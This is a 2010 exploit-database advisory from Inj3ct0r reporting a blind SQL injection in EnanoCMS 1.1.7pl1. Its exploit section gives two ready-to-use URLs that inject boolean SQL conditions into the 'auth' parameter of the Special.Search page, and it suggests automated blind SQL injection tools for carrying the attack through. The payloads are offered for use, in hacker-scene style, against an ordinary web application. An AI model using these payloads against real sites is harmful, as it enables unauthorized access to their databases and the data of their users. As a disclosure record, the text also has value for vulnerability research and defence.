1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ###################################### 1 0 Sweet Alg3rien Haxxz0or 1 ###################################### Exploit Title: EnanoCMS BlindSQL injection Date: 26/08/2010 Author: Sweet Contact : charif38@hotmail.fr Software Link: http://enanocms.org Download: http://enanocms.org/download Version: enano-1.1.7pl1 Tested on: WinXp sp3 Risk : Hight 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Exploits : if you got some probleme to exploit the bug please try to use paros proxy or some automated blind sql injection tools http://www.target.com/enanoCMS path/index.php/?title=Special%2ESearch&auth=111-222-1933email@address.tst'+and+31337-31337=0+--+&q=111-222-1933email@address.tst http://www.target.com/enanoCMS path/index.php/?title=Special%2ESearch&auth=111-222-1933email@address.tst"+and+31337-31337="0&q=111-222-1933email@address.tst thx to Milw0rm.com , JF - Hamst0r - Keystroke , inj3ct0r.com , exploit-db.com Saha Ftourkoum et 1,2,3 viva L'Algerie :))